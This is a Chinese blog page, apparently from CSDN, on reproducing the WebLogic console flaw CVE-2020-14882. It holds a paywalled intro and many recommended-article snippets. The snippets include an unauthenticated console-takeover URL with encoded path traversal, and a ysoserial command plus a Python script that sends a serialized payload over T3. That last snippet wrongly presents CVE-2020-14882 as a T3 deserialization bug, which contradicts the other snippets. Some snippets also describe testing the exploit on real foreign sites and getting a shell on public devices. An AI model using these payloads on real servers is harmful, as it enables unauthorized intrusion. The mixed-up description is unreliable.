CVE-2020-14882 weblogic 未授权命令执行复现及分析

最新推荐文章于 2025-02-10 20:29:32 发布
原创 最新推荐文章于 2025-02-10 20:29:32 发布 · 1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全 #安全

本文探讨了WebLogic 12中一个未经授权的漏洞,攻击者可通过HTTP利用宽字节安全实现远程代码执行。环境为Windows Server 2012搭配WebLogic 12,通过POC展示了如何在console端执行shell命令。安全提示与修复建议值得关注。

简介

该漏洞通过HTTP协议进行利用,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限。

 

环境搭建

 

windows server 2012

weblogic 12

通过宽字节安全的分析来看(调试源码):

 

http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String("ahihi")

 

 

根据其给出的POC

最低0.47元/天 解锁文章
Oracle WebLogic Server未授权远程代码执行漏洞处置方案
文公子的博客
11-06 1633
Oracle WebLogic Server未授权远程代码执行漏洞处置方案 2020年10月29日,Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)POC被公开,未经身份验证的远程攻击者通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,成功利用此漏洞的攻击者可在未经身份验证的情况下接管 WebLogic Server Console ,并执行任意代码。目前已经POC已经被公。由于此漏洞通过HTTP协议利用,利用门槛低危害大
CVE-2020-14882 WebLogic远程代码执行漏洞复现
热门推荐
千寻的博客
12-17 1万+
Weblogic简介 WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。 漏洞描述 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 We
weblogic——CVE_2020_14882
qq_17622203的博客
03-21 5342
影响版本 Oracle Weblogic Server 10.3.6.0.0Oracle Weblogic Server 12.1.3.0.0Oracle Weblogic Server 12.2.1.3.0Oracle Weblogic Server 12.2.1.4.0Oracle Weblogic Server 14.1.1.0.0 转自:weblogic 未授权命令执行漏洞(CVE-2020-14882,CVE-2020-14883)复现 - My_Dreams - 博客园 vulfocus开
CVE-2020-14882weblogic 未授权命令执行漏洞验证及修复
weixin_38896449的博客
12-02 4209
weblogic 未授权命令执行漏洞CVE-2020-148821.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 在Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update)中,包含一个存在于Weblogic Console中的高危远程代码执行漏洞CVE-2020-14882。未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 2.影响版本 Oracle Web
weblogic未授权命令执行(CVE-2020-14882)
qax
11-06 1174
weblogic未授权命令执行(CVE-2020-14882) 前言 因为最近太忙了,各种文档之类的乱七八糟的事,对于刚爆的weblogic未授权,fofa上找了几个国外的站测了一下,正好今天没什么事,打算写个文章记录一下 0x00 漏洞介绍 未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 0x01影响版本 Oracle Weblogic Server 10.3.6.0.0 Ora...
CVE-2020-14882
Dikesi的博客
02-10 1739
Weblogic未授权命令执行漏洞
cve-2020-14882 Weblogic未授权命令执行复现
weixin_47156475的博客
08-11 274
漏洞复现: 1.构造PoC,可以直接未授权接管后台: http://ip:port/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29 2.命令执行----->疯
Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882CVE-2020-14883)
m0_68045701的博客
07-10 2743
2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883。CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如。访问后台后是一个低权限的用户,无法安装应用,也无法直接执行任意代码。
CVE-2020-14882&14883:weblogic 未授权命令执行漏洞复现
Jietewang的博客
12-01 2968
1.Weblogic简介 Oracle WebLogic Server是用于构建和部署企业Java EE应用程序的业界最佳应用程序服务器,并支持新功能,这些新功能可降低运营成本,提高性能,增强可伸缩性并支持Oracle Applications产品组合。 这是一个Java的中间件,本人是这么理解的那要想更加详细的理解请查看官方介绍【官方介绍】。 2.漏洞描述 复现漏洞编号CVE-2020-14882,CVE-2020-14883 可以构造特殊的HTTP请求,在未经身份验证的情况下访问Weblogi
weblogic漏洞——CVE-2020-14882
weixin_57379923的博客
08-13 1912
版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。在 web 服务器中写入 xml 脚本。作 者:PeiyuJue。
CVE-2020-14882 Oracle WebLogic远程命令执行漏洞
dearya123的博客
06-28 2991
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server Console 多版本存在安全漏洞,该漏洞使未经身份验证的攻击者可以通过HTTP访问网络,从而破坏Oracle WebLogic Server,受影响版本如下: 10.3.6.0.0版本, 12.1.3.0.0版本, 12.2.1.3.0版本,
weblogic CVE-2020-14882~14883漏洞分析
include_heqile的博客
12-13 805
http://144.34.164.217/weblogic-cve-2020-1488214883lou-dong-fen-xi.html
Oracle WebLogic Server 安全漏洞(CVE-2020-14882)复现
2301_77132421的博客
07-05 2181
攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码。
Weblogic权限绕过之CVE-2020-14882利用和源码分析
weixin_45682070的博客
03-25 6926
前言: 环境: 利用: 代码分析: 鉴权代码分析CVE-2020-14882是权限绕过漏洞,所以我们直接切入主题,找到鉴权的代码,在idea中双击shift,查找doSecuredExecute方法。 此方法存在于\middleware\wlserver\modules\com.oracle.weblogic.servlet.jar!\weblogic\servlet\internal\WebAppServletContext.classWebAppServletContext类,可以看到中间有个se
CVE-2020-14882 weblogic未授权远程命令执行漏洞
栉风沐雪的博客
02-22 5918
Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
WebLogic: CVE-2020-14882/14883【getshell】
h1008685的博客
07-31 1625
记录第一次getshell公网设备 CVE-2020-14882:允许未授权的用户绕过管理控制台 (Console)的权限验证访问后台CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令 使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令漏洞 python开启http服务
servlet 脚本不执行_Weblogic Console HTTP协议远程代码执行漏洞复现CVE202014882
weixin_39745933的博客
12-11 522
0x01 漏洞描述近日,Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HT...
cve-2020-14882复现
最新发布
07-02
### CVE-2020-14882 漏洞复现步骤及利用方法 CVE-2020-14882 是 Oracle WebLogic Server 中的一个远程代码执行漏洞,攻击者可以在无需认证的情况下通过 T3 协议发送恶意请求,触发反序列化漏洞并执行任意代码。该漏洞影响多个版本的 WebLogic Server,包括 10.3.6.0、12.1.3.0、12.2.1.3、12.2.1.4 和 14.1.1.0 等版本[^5]。 #### 漏洞复现环境准备 为了复现此漏洞,建议使用 Vulhub 或手动搭建 WebLogic Server 环境。以下是基于 Vulhub 的部署步骤: 1. 安装 Docker 和 Docker Compose。 2. 克隆 Vulhub 项目,并切换到 CVE-2020-14882 漏洞目录: ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/weblogic/CVE-2020-14882 ``` 3. 启动容器: ```bash docker-compose up -d ``` 此时 WebLogic 服务将在 `http://your-ip:7001` 上运行[^5]。 #### 漏洞检测与验证 可通过以下方式确认目标是否受影响: - 使用 Nmap 进行指纹识别,判断是否运行了 WebLogic 并监听 T3 端口(默认为 7001)。 - 利用 ysoserial 工具生成恶意 payload,并尝试通过 T3 协议连接进行反序列化测试。 #### 漏洞利用步骤 1. **生成恶意 payload** 使用 ysoserial 构建反序列化载荷,例如使用 CommonsCollections6 链执行命令: ```bash java -jar ysoserial.jar CommonsCollections6 "calc.exe" > payload.bin ``` 2. **发送 payload** 利用 T3 协议向目标服务器发送恶意序列化对象。可借助 Python 脚本实现: ```python import socket import sys def send_exploit(ip, port, file_path): with open(file_path, 'rb') as f: payload = f.read() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ip, port)) # 发送 T3 协议头部 sock.send(b't3 11.1.0\nAS:255\nHL:19\nMS:10000000\nPU:t3://localhost:7001\ndata:\n\x00\x00\x00\x80') # 发送 payload sock.send(payload) sock.close() if __name__ == '__main__': ip = sys.argv[1] port = int(sys.argv[2]) file_path = sys.argv[3] send_exploit(ip, port, file_path) ``` 执行脚本: ```bash python exploit.py your-ip 7001 payload.bin ``` 若目标未打补丁,将弹出计算器窗口[^5]。 #### 漏洞修复建议 Oracle 在 2020 年 10 月发布的 CPU(Critical Patch Update)中修复了该漏洞。建议采取以下措施: - 及时升级至受支持的 WebLogic 版本并应用最新补丁。 - 如果无法立即升级,可在防火墙或负载均衡设备上限制对 T3 端口的访问,仅允许可信 IP 访问。 - 修改默认管理控制台路径,增强访问控制策略以减少攻击面[^4]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATOM_123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值